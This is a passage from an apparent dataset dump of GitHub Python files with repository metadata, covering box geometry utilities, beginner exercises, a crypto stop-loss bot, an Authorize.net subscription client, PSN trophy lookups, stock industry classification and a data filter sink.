boxes = boxes[..., :4]\n boxes_w = boxes[..., 2] - boxes[..., 0]\n boxes_h = boxes[..., 3] - boxes[..., 1]\n\n w_bias = 0.5 * (roi_wh_zoom_scale[0] - 1) * boxes_w\n h_bias = 0.5 * (roi_wh_zoom_scale[1] - 1) * boxes_h\n\n return torch.stack(\n [\n boxes[..., 0] - w_bias,\n boxes[..., 1] - h_bias,\n boxes[..., 2] + w_bias,\n boxes[..., 3] + h_bias,\n ],\n dim=-1,\n )\n\n\ndef minmax_to_corner_2d(minmax_box: np.ndarray):\n \"\"\"Convert min-max representation of a box into corner representation.\n\n Args:\n minmax_box (np.ndarray): [N, 2*ndim] box. 
ndim indicates whether it is\n a 2-d box or a 3-d box.\n\n Returns:\n np.ndarray: corner representation of a boxes.\n \"\"\"\n ndim = minmax_box.shape[-1] // 2\n center = minmax_box[..., :ndim]\n dims = minmax_box[..., ndim:] - center\n return center_to_corner_box2d(center, dims, origin=0.0)\n\n\ndef get_bev_bbox(coordinate, size, yaw):\n\n size = np.clip(size, a_min=1, a_max=None)\n if len(coordinate) == 0:\n return np.zeros([0, 4, 2])\n\n corners = size / 2\n corners = np.stack(\n [\n corners,\n corners * np.array([1, -1]),\n corners * np.array([-1, -1]),\n corners * np.array([-1, 1]),\n ],\n axis=-2,\n )\n bev_bbox = coor_transformation(corners, yaw[:, None], coordinate[:, None])\n\n return bev_bbox\n","repo_name":"xingyun-xy/cap","sub_path":"cap/core/box_utils.py","file_name":"box_utils.py","file_ext":"py","file_size_in_byte":10989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"7522849896","text":"#CTI-110\r\n#M3T1 - Areas of Rectangle\r\n#Oliver Hollis\r\n#11-09-2017\r\n#\r\n#Input the lenght and width of Rectangles\r\nrect_lenght1 = int(input('Enter the lenght of Rectangle 1: '))\r\nrect_width1 = int(input('Enter the lenght of Rectangle 1: '))\r\n\r\nrect_lenght2 = int(input('Enter the lenght of Rectangle 2: '))\r\nrect_width2 = int(input('Enter the lenght of Rectangle 2: '))\r\n\r\n# Caculate the Areas of the Rectangles\r\narea1 = rect_lenght1 * rect_width1\r\narea2 = rect_lenght2 * rect_width2\r\n\r\n# Determine which rectangle has a greater area\r\nif area1 > area2:\r\n print('Rectangle 1 has a greater area than Reactangle 2')\r\nelif area1 < area2:\r\n print('Rectangle 2 has a greater area than Reactangle 1')\r\nelse:\r\n print('Both have the same area')\r\n \r\n","repo_name":"holliso/cti110","sub_path":"M3T1_Areas_Rectangles_holliso.py","file_name":"M3T1_Areas_Rectangles_holliso.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"21757512180","text":"import sys\nimport time\nimport traceback\n\nimport requests\n\nfrom library import stop_signal, sat, sell_limit_stop_loss, setup_logger, SellAsset, AccountHoldingZero\nfrom binance.client import Client as BinanceClient\n\nname = \"VRA\"\nstop_price_in_satoshi = 6.3\n\nstop_price = stop_price_in_satoshi * sat\n\nsell_asset_kucoin = SellAsset(\"kucoin\", name, stop_price, True, BinanceClient.KLINE_INTERVAL_5MINUTE)\n\nlogger = setup_logger(sell_asset_kucoin.name)\nlogger.info(\"Starting {} stop-loss maker on {}\".format(sell_asset_kucoin.market, sell_asset_kucoin.exchange))\nlogger.info(\"Stop price is set up to : {:.8f} BTC\".format(stop_price))\n\nwhile 1:\n try:\n stop = stop_signal(sell_asset_kucoin.exchange, sell_asset_kucoin.market, sell_asset_kucoin.ticker, stop_price, 4)\n if stop:\n sell_limit_stop_loss(sell_asset_kucoin.market, sell_asset_kucoin)\n logger.info(\"Stop-loss LIMIT order has been made on {}, exiting\".format(sell_asset_kucoin.exchange))\n sys.exit(0)\n time.sleep(40)\n except AccountHoldingZero as warn:\n logger.warning(warn)\n sys.exit(\"Exit\")\n except Exception as err:\n if isinstance(err, requests.exceptions.ConnectionError) or isinstance(err, requests.exceptions.ReadTimeout):\n logger.error(\"Connection problem...\")\n else:\n traceback.print_tb(err.__traceback__)\n logger.exception(err.__traceback__)","repo_name":"sroziewski/trading-bot","sub_path":"stop_loss_kucoin.py","file_name":"stop_loss_kucoin.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"12165499376","text":"\"\"\"Utility functions for copying and archiving files and directory trees.\n\nXXX The functions here don't copy the resource fork or other metadata on Mac.\"\"\"\nimport shutil\n\n\ndef unpack(archive_path, path_to_unpack):\n \"\"\"Unpack archive to specified path.\"\"\"\n try:\n shutil.unpack_archive(archive_path, path_to_unpack)\n except ValueError:\n print('Not registered extension')\n","repo_name":"SiracencoSerghei/my-python-tasks","sub_path":"working_with_files/files_14_unzip.py","file_name":"files_14_unzip.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"1495794653","text":"#coding:utf-8\n#data不包含name的\nclass StartRecording():\n name = \"camera._startPreview\"\n def __init__(self,stimime=None,stiwidth=None,stiheight=None,stimode=None,stiframerate=None,stibirate=None,\n orimime=None, oriwidth=None, oriheight=None,oriframerate=None,oribirate=None, saveori=None,logmode=None,\n audmime=None,audbitraite=None,samplerate=None,sampleformat=None,\n channellayout=None,timeenable=None,timeinterval=None,duration=None,fileoverride=None,\n storagepath=None,stabilization=None,**kw):\n\n self.data = {\"audio\": {\"channelLayout\": channellayout, \"bitrate\": audbitraite, \"samplerate\": samplerate,\"mime\": audmime, \"sampleFormat\": sampleformat},\n \"origin\": {\"mime\": orimime, \"width\": oriwidth,\"height\": oriheight,\"saveOrigin\": saveori,\"bitrate\":oribirate,\"framerate\":oriframerate,'logMode':logmode},\n 'storageSpeedTest':'false'}\n if(stimime and stiwidth and stiheight and stimode and stiframerate and stibirate):\n self.data['stiching']= {\"mime\": stimime, \"width\": stiwidth, \"height\": stiheight, \"mode\": stimode,\"framerate\":stiframerate,\"bitrate\":stibirate}\n if(timeenable and timeinterval):\n self.data['timelapse']={\"enable\":timeenable, \"interval\":timeinterval}\n if(duration):\n self.data['duration']=duration\n if (fileoverride):\n self.data['fileOverride'] = fileoverride\n if (storagepath):\n self.data['storagePath'] = storagepath\n if (stabilization):\n self.data['stabilization'] = stabilization\n\n for key, value in kw.items():\n '''\n if (key not in self.data['parameters']):\n self.data['parameters'][key] = value\n '''\n if (key not in self.data.keys()):\n self.data[key] = value\n\n def getJsonData(self):\n return self.data\n\nif __name__=='__main__':\n s=StartRecording(stimime='h265')","repo_name":"somesomeprincess/prointerface","sub_path":"model/StartRecording.py","file_name":"StartRecording.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"40117093053","text":"MENU = {\n \"espresso\": {\n \"ingredients\": {\n \"water\": 50,\n \"milk\": 0,\n \"coffee\": 18,\n },\n \"cost\": 1.5,\n },\n \"latte\": {\n \"ingredients\": {\n \"water\": 200,\n \"milk\": 150,\n \"coffee\": 24,\n },\n \"cost\": 2.5,\n },\n \"cappuccino\": {\n \"ingredients\": {\n \"water\": 250,\n \"milk\": 100,\n \"coffee\": 24,\n },\n \"cost\": 3.0,\n }\n}\n\nprofit = 0\nresources = {\n \"water\": 300,\n \"milk\": 200,\n \"coffee\": 100,\n}\n\n\ndef payment(MENU):\n \"\"\"ask the user to insert coin shows the actual amount and verify if is enough for the drink\"\"\"\n total_coins = 0\n quarter = 0.25\n dime = 0.10\n nikel = 0.05\n penny = 0.01\n price_product = MENU[\"cost\"]\n print(\"Please insert coins\")\n quarter_insert = int(input(\"How many quarters: \"))\n total_quarter = quarter_insert * quarter\n total_coins += total_quarter\n print(f\"The total insert is {total_coins}\")\n dime_insert = int(input(\"How many dimes: \"))\n total_dimes = dime_insert * dime\n total_coins += total_dimes\n print(f\"The total insert is {total_coins}\")\n nikel_insert = int(input(\"How many nikel: \"))\n total_nikel = nikel_insert * nikel\n total_coins += total_nikel\n print(f\"The total insert is {total_coins}\")\n penny_insert = int(input(\"How many penny: \"))\n total_penny = penny_insert * penny\n total_coins += total_penny\n print(f\"The total insert is {total_coins}\")\n if total_coins >= MENU[\"cost\"]:\n print(\"Here is your drink enjoy!!\")\n if total_coins > MENU[\"cost\"]:\n change = round(total_coins - MENU[\"cost\"], 2)\n print(f\"You're change : {change}\")\n profit = total_coins - change\n return profit\n else:\n print(f\"You insert {total_coins}, the prize is {price_product}\\n I give back your money\")\n profit = 0\n return profit\n\n\ndef resources_check(water, milk, coffee, MENU):\n \"\"\"Check if is enough ingredients in the coffee machine\"\"\"\n if water < MENU[\"ingredients\"][\"water\"]:\n print(\"Sorry there is not enough water\")\n check = False\n return check\n elif coffee < MENU[\"ingredients\"][\"coffee\"]:\n print(\"Sorry there is not enough coffee\")\n check = False\n return check\n elif milk < MENU[\"ingredients\"][\"milk\"]:\n print(\"Sorry there is not enough coffee\")\n check = False\n return check\n else:\n check = True\n return check\n\nwater = resources[\"water\"]\nmilk = resources[\"milk\"]\ncoffee = resources[\"coffee\"]\nmoney = 0\non = True\nwhile on:\n order = input(\"What do you like? 
espresso, latte, cappuccino,prize: \").lower()\n # TODO print the report\n\n if order == \"report\":\n print(f\"Water: {water}\\nMilk: {milk} \\nCoffee: {coffee}\\nMoney:$ {money}\")\n elif order == \"off\":\n on = False\n elif order == \"price\":\n print(\"Espresso price:$\", MENU[\"espresso\"][\"cost\"], \"\\n\", \"Latte price:$\", MENU[\"latte\"][\"cost\"], \"\\n\",\n \"Cappuccino price:$\", MENU[\"cappuccino\"][\"cost\"])\n elif order == \"espresso\":\n is_enough = resources_check(water, milk, coffee, MENU[\"espresso\"])\n if is_enough:\n water -= MENU[\"espresso\"][\"ingredients\"][\"water\"]\n coffee -= MENU[\"espresso\"][\"ingredients\"][\"coffee\"]\n money_es = payment(MENU[\"espresso\"])\n money += money_es\n elif order == \"latte\":\n is_enough = resources_check(water, milk, coffee, MENU[\"latte\"])\n if is_enough:\n water -= MENU[\"latte\"][\"ingredients\"][\"water\"]\n milk -= MENU[\"latte\"][\"ingredients\"][\"milk\"]\n coffee -= MENU[\"latte\"][\"ingredients\"][\"coffee\"]\n money_la = payment(MENU[\"latte\"])\n money += money_la\n elif order == \"cappuccino\":\n is_enough = resources_check(water, milk, coffee, MENU[\"cappuccino\"])\n if is_enough:\n water -= MENU[\"cappuccino\"][\"ingredients\"][\"water\"]\n milk -= MENU[\"cappuccino\"][\"ingredients\"][\"milk\"]\n coffee -= MENU[\"cappuccino\"][\"ingredients\"][\"coffee\"]\n money_cap = payment(MENU[\"cappuccino\"])\n money += money_cap\n\n\n","repo_name":"Vvollono/machine_coffee","sub_path":"coffee_machine_v1.0.py","file_name":"coffee_machine_v1.0.py","file_ext":"py","file_size_in_byte":4240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70560904808","text":"import apoc\nfrom skimage.io import imread, imsave\nfrom pathlib import Path\nimport numpy as np\n\n\ndef test_back_and_forth_feature_ordering():\n root = Path(apoc.__file__).parent\n img_path = str(root / '..' / 'demo' / 'blobs.tif')\n image = imread(img_path)\n\n img_path = str(root / '..' / 'demo' / 'annotations.tif')\n gt_image = imread(img_path)\n\n img_path = str(root / '..' / 'demo' / 'reference_labels.tif')\n ref_image = imread(img_path)\n\n feature_specs = \"original gaussian_blur=1 sobel_of_gaussian_blur=1\"\n\n classifier = apoc.ObjectSegmenter(positive_class_identifier=2, num_ensembles=100)\n classifier.train(feature_specs, gt_image, image)\n\n result1 = classifier.predict(image=image)\n\n feature_specs = \"sobel_of_gaussian_blur=1 gaussian_blur=1 original\"\n\n classifier = apoc.ObjectSegmenter(positive_class_identifier=2, num_ensembles=100)\n classifier.train(feature_specs, gt_image, image)\n\n result2 = classifier.predict(image=image)\n\n binary1 = result1 > 0\n binary2 = result2 > 0\n\n imsave(\"binary1.tif\", binary1)\n imsave(\"binary2.tif\", binary2)\n\n intersection = binary1 * binary2\n union = (binary1 + binary2) > 0\n\n jaccard_index = intersection.sum() / union.sum()\n\n print(jaccard_index)\n\n assert jaccard_index > 0.999\n\n\n","repo_name":"haesleinhuepf/apoc","sub_path":"tests/test_back_and_forth_feature_ordering.py","file_name":"test_back_and_forth_feature_ordering.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"53"}
+{"seq_id":"29888171634","text":"import httplib\ntry:\n from xml.etree import ElementTree\nexcept ImportError:\n # Python < 2.5\n from elementtree import ElementTree\n\n# ARB expects request parameters in a particular order\nREQUEST_KEY_ORDER = (\"merchantAuthentication refId subscriptionId subscription name transactionKey \"\n \"paymentSchedule interval length unit \"\n \"startDate totalOccurrences trialOccurrences amount trialAmount \"\n \"payment creditCard cardNumber expirationDate cardCode bankAccount \"\n \"accountType routingNumber accountNumber nameOnAccount echeckType \"\n \"bankName order invoiceNumber description customer id email \"\n \"phoneNumber faxNumber billTo firstName lastName company address \"\n \"city state zip country shipTo\".split())\n\ndef arb_request_key_order(i):\n try:\n return REQUEST_KEY_ORDER.index(i[0])\n except ValueError:\n raise Exception('Unexpected ARB request key: %s' % i[0])\n\ndef xmlify_dict(d, indent=0):\n s = ''\n for k, v in sorted(d.items(), key=arb_request_key_order):\n if isinstance(v, dict):\n v = '\\n' + xmlify_dict(v, indent + 2) + ' ' * indent\n s += '%s<%s>%s%s>\\n' % (' ' * indent, k, v, k)\n return s\n\ndef dictify_etree_node(node):\n d = {}\n for child in node:\n d[child.tag[child.tag.index('}') + 1:]] = dictify_etree_node(child)\n return d or node.text.strip()\n\nclass ARBConnection(object):\n\n def __init__(self, server, login, key, salt=None, timeout=None):\n self.server = server\n self.login = login\n self.salt = salt\n self.timeout = timeout\n self.key = key\n self.authentication = {\n 'name': self.login,\n 'transactionKey': self.key\n }\n\n def sendTransaction(self, method, **kw):\n kw['merchantAuthentication'] = self.authentication\n \n xml = \"\"\"\n<%s xmlns=\"AnetApi/xml/v1/schema/AnetApiSchema.xsd\">\n%s\n%s>\n\"\"\" % (method, xmlify_dict(kw), method)\n \n if self.server.startswith('localhost:'):\n server, port = self.server.split(':')\n conn = httplib.HTTPConnection(server, port)\n else:\n conn = httplib.HTTPSConnection(self.server, timeout=self.timeout)\n conn.putrequest('POST', '/xml/v1/request.api')\n conn.putheader('content-type', 'text/xml')\n conn.putheader('content-length', len(xml))\n conn.endheaders()\n conn.send(xml)\n\n response = conn.getresponse().read()\n root = ElementTree.fromstring(response)\n result = dictify_etree_node(root)\n result['full_response'] = response\n return result\n\n\nclass ARBProcessor(object):\n def __init__(self, server, login, key, salt=None, timeout=None):\n self.connection = ARBConnection(server, login, key, salt, timeout)\n\n def create(self, **kw):\n if not isinstance(kw['subscription']['amount'], basestring):\n raise ValueError('Subscription amount must be a string')\n if not isinstance(kw['subscription'].get('trialAmount', ''), basestring):\n raise ValueError('Subscription trialAmount must be a string')\n\n return self.connection.sendTransaction('ARBCreateSubscriptionRequest', **kw)\n\n def update(self, **kw):\n return self.connection.sendTransaction('ARBUpdateSubscriptionRequest', **kw)\n\n def cancel(self, **kw):\n return self.connection.sendTransaction('ARBCancelSubscriptionRequest', **kw)\n","repo_name":"collective/getpaid.authorizedotnet","sub_path":"src/getpaid/authorizedotnet/subscription.py","file_name":"subscription.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"30616386964","text":"from psnawp_api import psnawp\nimport userInfo\nimport login\n\n# 유저 인스턴스 선언\nuserInfoInstance = userInfo.UserInfo(login.onlineID, login.npssoCode).GetPlayerInstance()\n\nuserProfile = userInfoInstance.profile()\n\n#print(userProfile)\n\n# 유저의 프로필 사진의 URL을 가져옴\ndef GetUserProfileImageURL():\n profileImageURL = userProfile['personalDetail']['profilePictures'][1]['url'] # size 'm'의 url을 가져옴\n\n return profileImageURL\n\n# 유저의 psn 이름을 가져옴\ndef GetUserProfileName():\n firstName = userProfile['personalDetail']['firstName']\n lastName = userProfile['personalDetail']['lastName']\n fullName = firstName + lastName\n\n return fullName\n\n# 유저의 총 트로피 개수를 가져옴\ndef GetUserProfileTrophies():\n trophySummary = userInfoInstance.GetTrophyProfileSummary()\n\n # 유저의 전체 트로피 개수를 트로피 별로 가져온다\n trophyCount_bronze = trophySummary['earnedTrophies']['bronze']\n trophyCount_silver = trophySummary['earnedTrophies']['silver']\n trophyCount_gold = trophySummary['earnedTrophies']['gold']\n trophyCount_platinum = trophySummary['earnedTrophies']['platinum']\n\n # 전체 트로피 개수\n trophyCount_total = trophyCount_bronze + trophyCount_silver + trophyCount_gold + trophyCount_platinum\n\n # 유저 트로피 정보를 딕셔너리 형태로 내보낸다\n userTrophyCountInfo = {\n 'bronze' : trophyCount_bronze,\n 'silver' : trophyCount_silver,\n 'gold' : trophyCount_gold,\n 'platinum' : trophyCount_platinum,\n 'total' : trophyCount_total\n }\n\n return userTrophyCountInfo\n\n# 유저의 프로필 레벨을 가져옴 (나중에 추가)\ndef GetUserProfileTrophyLevel():\n trophySummary = userInfoInstance.GetTrophyProfileSummary()\n \n return trophySummary['trophyLevel']","repo_name":"snwdaaa/PSAchivementManager","sub_path":"psam/src/getUserInfos.py","file_name":"getUserInfos.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"211572576","text":"\r\nimport os\r\nimport datetime as dt\r\nimport numpy as np\r\nimport pandas as pd\r\nimport scipy.io as scio\r\n\r\nfrom remotewind import w\r\n\r\n\r\n\r\n\r\n\r\ndef get_dict(dtype='change'):\r\n if dtype=='change':\r\n swChangeLevel1 = pd.read_csv(r'E:\\stocks_data\\sw_industry\\change_dict.csv', encoding='gbk')\r\n swChangeDict = {}\r\n for dumi in range(swChangeLevel1.shape[0]):\r\n if swChangeDict.get(swChangeLevel1['swName1Old'][dumi]) is None:\r\n swChangeDict[swChangeLevel1['swName1Old'][dumi]] = [swChangeLevel1['swName1New'][dumi]]\r\n else:\r\n swChangeDict[swChangeLevel1['swName1Old'][dumi]].append(swChangeLevel1['swName1New'][dumi])\r\n return swChangeDict\r\n else:\r\n swNameLevel1 = pd.read_csv(r'E:\\stocks_data\\sw_industry\\sw_dict_level1.csv', encoding='gbk')\r\n swNameCodeDict = {swNameLevel1['swName1'][dumi]: swNameLevel1['swCode1'][dumi] for dumi in range(swNameLevel1.shape[0])}\r\n swNameCodeDict[np.nan] = -1\r\n return swNameCodeDict\r\n\r\nclass CONSTATNS:\r\n LATEST = 20180709\r\n swNameCodeDict = get_dict(dtype='name')\r\n swChangeDict = get_dict(dtype='change')\r\n\r\n\r\ndef date_trans(tdt):\r\n if isinstance(tdt,str):\r\n return int(dt.datetime.strptime(tdt,'%Y/%m/%d').strftime('%Y%m%d'))\r\n elif np.isnan(tdt):\r\n return CONSTATNS.LATEST\r\n\r\ndef history_sw_data():\r\n lastData = pd.read_csv(r'E:\\stocks_data\\sw_industry\\sw_data\\sw_industry_20180709.csv',encoding='gbk')\r\n lastStks = lastData['stkcd'].values\r\n histData = pd.read_csv(r'.\\sw_history.csv',encoding='gbk')\r\n histData.columns = ['stkcd','exchg','stkname','standerd','indate','outdate','swName1','swName2','swName3','isnew']\r\n histData['stkcd'] = histData['stkcd'].map(lambda x:int(x))\r\n histData['indate'] = histData['indate'].map(date_trans)\r\n histData['outdate'] = histData['outdate'].map(date_trans)\r\n trdDates = scio.loadmat(r'E:\\bqfcts\\bqfcts\\data\\trddates.mat')['trddates'][:,0]\r\n stkInfo = scio.loadmat(r'E:\\bqfcts\\bqfcts\\data\\stkinfo.mat')['stkinfo'][:,[0,1,2]] # stkcd and ipo date\r\n stkInfo[:,2] = CONSTATNS.LATEST\r\n offListed = sorted(list(set(stkInfo[:, 0]) - set(lastStks)))\r\n stkInfo = pd.DataFrame(stkInfo,columns=['stkcd','ipo_date','delist_date']).set_index('stkcd')\r\n offListedWind = ['{}.SH'.format(stkcd) if stkcd>=600000 else ''.join(['0'*(5-int(np.log10(stkcd))),'{}.SZ'.format(stkcd)]) for stkcd in offListed]\r\n offListedDate = [int(tdt.strftime('%Y%m%d')) for tdt in w.wss(offListedWind,'delist_date').Data[0]]\r\n stkInfo.loc[offListed,'delist_date'] = offListedDate\r\n stkInfo.reset_index(inplace=True)\r\n for tdt in trdDates:\r\n if tdt>=CONSTATNS.LATEST:\r\n break\r\n listedIdx = np.logical_and(stkInfo['ipo_date'].values<=tdt,stkInfo['delist_date'].values>=tdt)\r\n listedStocks = stkInfo.loc[listedIdx,'stkcd']\r\n histCut = histData.loc[np.isin(histData['stkcd'],listedStocks),:]\r\n histCutIdx = np.logical_and(histCut['indate'].values<=tdt,histCut['outdate'].values>tdt)\r\n histCut = histCut.loc[histCutIdx,['stkcd','swName1','swName2','swName3']]\r\n if histCut.empty:\r\n print('{} is empty'.format(tdt))\r\n histCut.to_csv(os.path.join(r'E:\\stocks_data\\sw_industry\\sw_data','sw_industry_{}.csv'.format(tdt)),index=False)\r\n\r\n\r\ndef sw_leve1_code(swName1,swName2,stkcd,tdate,lastNoChange,firstChange):\r\n if swName1 in CONSTATNS.swNameCodeDict:\r\n code = CONSTATNS.swNameCodeDict[swName1]\r\n elif swName1 in CONSTATNS.swChangeDict:\r\n if len(CONSTATNS.swChangeDict[swName1])==1: # 一一对应,直接返回即可\r\n code = 
CONSTATNS.swNameCodeDict[CONSTATNS.swChangeDict[swName1][0]]\r\n else: # 旧名 一对多 新名,\r\n # 先通过 二级行业进行匹配\r\n name2Pair = np.array([name in swName2 for name in CONSTATNS.swChangeDict[swName1]])\r\n if swName2 in CONSTATNS.swChangeDict[swName1]: # 二级行业名 变更为 新一级行业名\r\n code = CONSTATNS.swNameCodeDict[swName2]\r\n elif swName1 == '金融服务' and swName2 != '银行': # 非银 特殊处理\r\n code = CONSTATNS.swNameCodeDict['非银金融']\r\n elif swName1 == '信息服务' and swName2=='网络服务':\r\n code = CONSTATNS.swNameCodeDict['计算机']\r\n elif np.any(name2Pair): # 新一级行业 包含于 旧二级行业\r\n code = CONSTATNS.swNameCodeDict[CONSTATNS.swChangeDict[swName1][np.argwhere(name2Pair)[0][0]]]\r\n else: # 二级行业匹配失败,按照行业变更后 该股票所属行业\r\n if stkcd in firstChange.index: # 若该股票行业变动时还为退市,对照改名后该股票所在的行业\r\n newName1 = firstChange.loc[stkcd,'swName1']\r\n if newName1 in CONSTATNS.swChangeDict[swName1]: # 变更后的行业名 处在 变更字典中\r\n code = CONSTATNS.swNameCodeDict[newName1]\r\n else: # 变更后股票未退市,但是该股票发生行业变更,且变更后行业 不属于变更字典,需要特殊处理\r\n code = np.nan\r\n else: # 行业变更时 股票已经退市 匹配失败\r\n code = np.nan\r\n else: #\r\n code = np.nan\r\n if tdate<=20131231: # 使变更前的行业恢复的更加均衡\r\n if (stkcd in firstChange.index) and (stkcd in lastNoChange.index):\r\n newName1 = firstChange.loc[stkcd, 'swName1']\r\n code = CONSTATNS.swNameCodeDict[newName1] if lastNoChange.loc[stkcd,'swName1']==swName1 else code # 与变更前对后一天相同的行业,使用变更后的代码\r\n return code\r\n\r\n\r\ndef update_sw_mat():\r\n\r\n trdDates = scio.loadmat(r'E:\\bqfcts\\bqfcts\\data\\trddates.mat')['trddates'][:, 0]\r\n stkCodes = scio.loadmat(r'E:\\bqfcts\\bqfcts\\data\\stkinfo.mat')['stkinfo'][:, 0]\r\n ##### update mat #####\r\n swPath = r'E:\\stocks_data\\sw_industry\\sw_data'\r\n histMatName = 'data_19901219_20170630'\r\n histPath = os.path.join(r'E:\\bqfcts\\bqfcts\\data\\SW_Industry','{}.mat'.format(histMatName))\r\n if not os.path.exists(histPath):\r\n histStkNum = 3433\r\n histDayNum = 6488\r\n histStks = stkCodes[:histStkNum]\r\n histTrds = trdDates[:histDayNum]\r\n histMat = pd.DataFrame(np.zeros([histStkNum,histDayNum]),index=histStks,columns=histTrds)\r\n firstChange = pd.read_csv(os.path.join(swPath,'sw_industry_20140102.csv'), encoding='gbk').set_index('stkcd')\r\n lastNoChange = pd.read_csv(os.path.join(swPath, 'sw_industry_20131231.csv'), encoding='gbk').set_index('stkcd')\r\n for tdt in histTrds:\r\n swData = pd.read_csv(os.path.join(swPath,'sw_industry_{}.csv'.format(tdt)),encoding='gbk').set_index('stkcd')\r\n swCode1 = []\r\n for stkcd in swData.index.values:\r\n swName1 = swData.loc[stkcd, 'swName1']\r\n swName2 = swData.loc[stkcd, 'swName2']\r\n swCode1.append(sw_leve1_code(swName1=swName1,\r\n swName2=swName2,\r\n stkcd=stkcd,\r\n tdate=tdt,\r\n lastNoChange=lastNoChange,\r\n firstChange=firstChange))\r\n swData['swCode1'] = swCode1\r\n histMat.loc[swData.index,tdt] = swData['swCode1']\r\n print(tdt)\r\n scio.savemat(file_name=histPath, mdict={'swIndustry': histMat.values})\r\n print('hist mat created')\r\n currMatName = 'data_20150701_now'\r\n currPath = os.path.join(r'E:\\bqfcts\\bqfcts\\data\\SW_Industry', '{}.mat'.format(currMatName))\r\n currDayStart = 6000\r\n if not os.path.exists(currPath):\r\n currTrds = trdDates[currDayStart:]\r\n currMat = pd.DataFrame(np.zeros([stkCodes.shape[0], currTrds.shape[0]]), index=stkCodes, columns=currTrds)\r\n for tdt in currTrds:\r\n swData = pd.read_csv(os.path.join(swPath,'sw_industry_{}.csv'.format(tdt)),encoding='gbk').set_index('stkcd')\r\n swData['swCode1'] = swData['swName1'].map(CONSTATNS.swNameCodeDict)\r\n currMat.loc[swData.index,tdt] = swData['swCode1']\r\n 
print(tdt)\r\n scio.savemat(file_name=currPath, mdict={'swIndustry':currMat.values})\r\n print('curr mat created')\r\n else:\r\n currDates = trdDates[currDayStart:]\r\n currStkcds = stkCodes\r\n currDayNum = currDates.shape[0]\r\n currStkNum = currStkcds.shape[0]\r\n currMatSaved = scio.loadmat(currPath)['swIndustry']\r\n (savedStkNum, savedDayNum) = currMatSaved.shape\r\n if (currDayNum == savedDayNum) and (currStkNum == savedStkNum):\r\n print('no data to update')\r\n return\r\n currTrds = currDates[currDayNum-2:] # 前一天的重新更新,弥补新股\r\n currMat = pd.DataFrame(np.zeros([currStkNum, currDayNum-savedDayNum+1]), index=stkCodes,columns=currTrds)\r\n for tdt in currTrds:\r\n swData = pd.read_csv(os.path.join(swPath, 'sw_industry_{}.csv'.format(tdt)), encoding='gbk').set_index('stkcd')\r\n swData['swCode1'] = swData['swName1'].map(CONSTATNS.swNameCodeDict)\r\n currMat.loc[swData.index, tdt] = swData['swCode1']\r\n patch = np.zeros([currStkNum-savedStkNum, savedDayNum - 1])\r\n currMat = np.column_stack([np.row_stack([currMatSaved[:,:-1],patch]), currMat.values])\r\n scio.savemat(file_name=currPath, mdict={'swIndustry': currMat})\r\n print('curr mat updated')\r\n\r\nif __name__=='__main__':\r\n update_sw_mat()\r\n # pr = scio.loadmat(r'C:\\Users\\Jiapeng\\Desktop\\matlab.mat')['t']\r\n # old = pd.read_csv(r'E:\\stocks_data\\sw_industry\\sw_data\\sw_industry_20131231.csv',encoding='gbk').set_index('stkcd')\r\n # new = pd.read_csv(r'E:\\stocks_data\\sw_industry\\sw_data\\sw_industry_20140102.csv',encoding='gbk').set_index('stkcd')\r\n # data = pd.concat([old.loc[pr[:,0],'swName1'],new.loc[pr[:,0],'swName1']],axis=1)\r\n # data.to_csv(r'E:\\stocks_data\\sw_industry\\tempdict.csv')\r\n","repo_name":"wqxl309/sw_industry","sub_path":"history_sw_industry.py","file_name":"history_sw_industry.py","file_ext":"py","file_size_in_byte":10236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"3227127025","text":"from abc import abstractmethod\n\nfrom .base import Component\nfrom ..utils.filter import filter_dict, load_filter_file\n\n\nclass Sink(Component):\n \"\"\"\n Main base class to implement a Sink.\n \"\"\"\n\n def __init__(\n self, index, type_, id_,\n optional=False, timeout=None, config=None\n ):\n super().__init__(\n index, type_, id_,\n optional=optional, timeout=timeout, config=config\n )\n\n def _component_execute(self, data):\n \"\"\"\n Sink component execute override.\n\n This function will just call the user provided ``distribute()``\n function with the input data and return an empty dictionary\n (\"no data\").\n \"\"\"\n self.distribute(data)\n return {}\n\n @abstractmethod\n def distribute(self, data):\n \"\"\"\n Distribute the collected data.\n\n All sinks subclasses must implement this abstract method.\n\n :param OrderedDict data: The collected data. This dictionary can be\n modified as required without consequences for the pipeline.\n \"\"\"\n pass\n\n\nclass FilterSink(Sink):\n \"\"\"\n Common sink base class that adds several inclusion and exclusion\n configuration options for filtering data before using it.\n\n See :ref:`filter-sink-options` for more information.\n \"\"\"\n\n def declare_config(self, config):\n config.add_option(\n 'include',\n default=['*'],\n optional=True,\n schema={\n 'type': 'list',\n 'schema': {\n 'type': 'string',\n },\n },\n )\n\n config.add_option(\n 'include_files',\n default=[],\n optional=True,\n schema={\n 'type': 'list',\n 'schema': {\n 'type': 'string',\n 'empty': False,\n },\n },\n )\n\n config.add_option(\n 'exclude',\n default=[],\n optional=True,\n schema={\n 'type': 'list',\n 'schema': {\n 'type': 'string',\n },\n },\n )\n\n config.add_option(\n 'exclude_files',\n default=[],\n optional=True,\n schema={\n 'type': 'list',\n 'schema': {\n 'type': 'string',\n 'empty': False,\n },\n },\n )\n\n @abstractmethod\n def distribute(self, data):\n include = self.config.include.value\n for include_file in self.config.include_files.value:\n for pattern in load_filter_file(include_file):\n if pattern not in include:\n include.append(pattern)\n\n exclude = 